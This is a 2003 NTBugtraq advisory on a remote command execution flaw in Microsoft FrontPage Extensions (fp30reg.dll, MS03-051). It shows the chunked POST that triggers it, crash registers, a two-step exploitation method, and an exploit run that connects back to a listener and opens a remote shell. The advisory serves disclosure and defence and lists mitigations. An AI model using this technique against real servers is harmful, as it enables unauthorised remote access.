Frontpage Extensions Remote Command Execution

From: Brett Moore (brett.moore_at_SECURITY-ASSESSMENT.COM)
Date: 11/12/03

  • Next message: Russ: "Re: Microsoft Security Bulletin MS03-049 - Installation problems?"
    Date:         Wed, 12 Nov 2003 13:35:16 +1300
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    ========================================================================
    = Frontpage Extensions Remote Command Execution
    =
    = MS Bulletin posted:
    = http ://www.microsoft.com/technet/security/bulletin/ms03-051.asp
    =
    = Affected Software:
    = Microsoft Windows 2000 Service Pack 2, Service Pack 3
    = Microsoft Windows XP, Microsoft Windows XP Service Pack 1
    = Microsoft Office XP, Microsoft Office XP Service Release 1
    =
    = Public disclosure on November 11, 2003
    ========================================================================

    Continuing 'The Methodical Approach To Finding Overflows' we moved to
    the next attack avenue. After the success against nsiislog.dll we were
    again greeted by an access violation message leading to the discovery
    of another remote vulnerability.

    == Description ==

    Sending a chunked encoded post to fp30reg.dll will cause an access
    violation resulting in the following error log.

    ------------------------------------------------------------------------
    Event Type: Warning
    Event Source: W3SVC
    Event Category: None
    Event ID: 37
    Description:
    Out of process application '/LM/W3SVC/1/ROOT' terminated unexpectedly.
    ------------------------------------------------------------------------

    A chunked encoded post will result in the control of ECX and EDI, with
    the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading
    to remote command execution with privileges associated with the
    IWAM_machinename account.

    == Chunked Transfer-Encoding Post ==

    POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
    Transfer-Encoding: chunked

    PostLength
    PostData
    0

    == Exploitation ==

    [Code Segment]
     67D46AD3 mov ecx,dword ptr [ebx+edx+8]
     67D46AD7 mov edi,dword ptr [ebx+edx+4]
     67D46ADB mov dword ptr [ecx+4],edi

    [Registers]
     EAX = 046F83E8 EBX = 00000010 ECX = 58585858
     EDX = 05450FEC ESI = 0000000C EDI = 58585858
     EIP = 67D46ADB ESP = 0120F648 EBP = 0120F668

    [EDX DUMP]
     05450FEC 11 00 00 00 58 58 58 ....XXX
     05450FF3 58 58 58 58 58 58 58 XXXXXXX
     05450FFA 58 58 58 58 58 58 58 XXXXXXX
     05451001 58 58 58 58 58 58 58 XXXXXXX
     05451008 58 58 58 58 58 58 58 XXXXXXX
     0545100F 58 58 58 58 58 58 58 XXXXXXX
     05451016 58 58 58 58 58 58 58 XXXXXXX

    Many different ways to exploit this malloc/free scenario, so instead of
    the usual SEH redirect to a JMP instruction, we took a two step approach
    for higher reliability.

    At the first exception error we are in control of ECX and EDI allowing
    us to write our JMP instruction to a known writeable space. This does
    not cause an exception and execution flow continues through to a CALL
    instruction that uses a value from our buffer. We use this CALL to
    reach our JMP instruction.

    == Exploit Example ==

    %:\>exploit 192.168.1.63

    ** FP30REG.DLL - Ver 4.0.2.5526 - Remote Shell **

    . Calling Home: blackhole:2000
    . Using: 0x---------h as writeable data space
    . Shellcode Size: 304 bytes
    . Preparing Exploit Buffer......Ready
    . Starting Listener On Port: 2000
    . Connecting To 192.168.1.63
    . Sending Exploit......Exploit Sent
    . Connection Received

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    C:\WINNT\system32>whoami
    IWAM_BLACKHOLE
    C:\WINNT\system32>

    == Solutions ==

    - Every day is a 0-day day on the Internet. Limiting the avenues of attack
      can be a key factor in reducing the risk to a web server. Programs such
      as secureIIS and URLscan should be setup to reduce the number of methods
      that can be used to send data to a server. Removing unnecessary services,
      files and isapi extensions reduces the number of listeners that data can
      be fed to limiting the number of vulnerabilities that a server is
      susceptible to.
    - Install the vendor supplied patch.

    == Credit ==

    Discovered and advised to Microsoft January 30, 2003 by Brett Moore of
    Security-Assessment.com

    == About Security-Assessment.com ==

    Security-Assessment.com is a leader in intrusion testing and security
    code review, and leads the world with SA-ISO, online ISO17799 compliance
    management solution. Security-Assessment.com is committed to security
    research and development, and its team have previously identified a
    number of vulnerabilities in public and private software vendors products.

    ----
    NTBugtraq subscribers save $103.00 off the TICSA exam by using promo
    code "NT1003" when registering to take the TICSA exam at www.2test.com.
    Prove to your employer and peers that you have the knowledge and
    abilities to be an active stakeholder in today's enterprise security.
    Become TICSA certified www.trusecure.com/ticsa.  Promotion expires
    12/31/03 and cannot be used in combination with other offers.
    ----
    

  • Next message: Russ: "Re: Microsoft Security Bulletin MS03-049 - Installation problems?"